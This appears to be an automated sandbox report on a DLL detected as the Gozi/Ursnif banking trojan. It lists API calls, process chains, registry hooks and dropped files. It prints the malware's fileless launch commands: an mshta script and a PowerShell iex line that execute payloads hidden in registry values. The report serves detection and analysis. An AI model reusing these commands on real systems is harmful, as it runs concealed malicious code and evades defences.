Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_02774F73 GetProcAddress,NtCreateSection,memset,	2_2_02774F73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027711A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_027711A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277B159 NtQueryVirtualMemory,	2_2_0277B159
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540E529 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	2_2_0540E529
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05410D8D memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	2_2_05410D8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540CCD9 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	2_2_0540CCD9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05415E21 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	2_2_05415E21
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541C6FE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	2_2_0541C6FE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05405E8A NtQueryInformationProcess,	2_2_05405E8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05422AAC NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	2_2_05422AAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05414518 NtGetContextThread,RtlNtStatusToDosError,	2_2_05414518
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_054105FC NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	2_2_054105FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05408F6D NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_05408F6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_054117CD memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	2_2_054117CD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05422E10 NtQuerySystemInformation,RtlNtStatusToDosError,	2_2_05422E10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540E6C4 memset,NtQueryInformationProcess,	2_2_0540E6C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05403934 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	2_2_05403934
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540A818 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	2_2_0540A818
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540F314 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_0540F314
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05402A0A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	2_2_05402A0A

Contains functionality to launch a process as a different user

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_054235BC CreateProcessAsUserA,

2_2_054235BC

Detected potential crypto function

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_027728E9	2_2_027728E9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277AF34	2_2_0277AF34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05423C5C	2_2_05423C5C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541BC93	2_2_0541BC93
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0541CFA3	2_2_0541CFA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05421669	2_2_05421669
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05412678	2_2_05412678
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05413604	2_2_05413604
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0542086C	2_2_0542086C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_05414804	2_2_05414804
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540C307	2_2_0540C307
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0540BBA1	2_2_0540BBA1

PE file does not import any functions

Source: mu1rnx1a.dll.27.dr	Static PE information: No import functions for PE file found
Source: yacmzdf3.dll.30.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll			Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cryptdlg.dll

Uses 32bit PE files

Source: NJPcHPuRcG.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Yara signature match

Source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY

Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: NJPcHPuRcG.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winDLL@36/159@18/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_027731DD CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,

2_2_027731DD

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{75BD31D2-7017-11EB-90E5-ECF4BB570DC9}.dat

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8AE918E3-61CB-4CED-3B5E-25409F722974}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5148:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{F653DE64-DD3A-98FE-178A-614C3B5E2540}

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Temp\~DFD1DF0FD1C3CEAF12.TMP

Jump to behavior

Source: NJPcHPuRcG.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: NJPcHPuRcG.dll

Virustotal: Detection: 15%

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:82962 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17422 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6488 CREDAT:17430 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES78AB.tmp' 'c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8CA0.tmp' 'c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown
Source: C:\Windows\explorer.exe	Process created: unknown unknown

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\explorer.exe

File opened: C:\Windows\SYSTEM32\msftedit.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: NJPcHPuRcG.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: NJPcHPuRcG.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp

Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NJPcHPuRcG.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Compiles C# or VB.Net code

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline'

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_0542556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0542556E

Registers a DLL

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277AF23 push ecx; ret	2_2_0277AF33
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0277ABF0 push ecx; ret	2_2_0277ABF9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0542769F push ecx; ret	2_2_054276AF

Source: initial sample

Static PE information: section name: .text entropy: 6.87914884899

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.336044765.0000000004DBB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 6448, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFA9B33521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFA9B335200

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
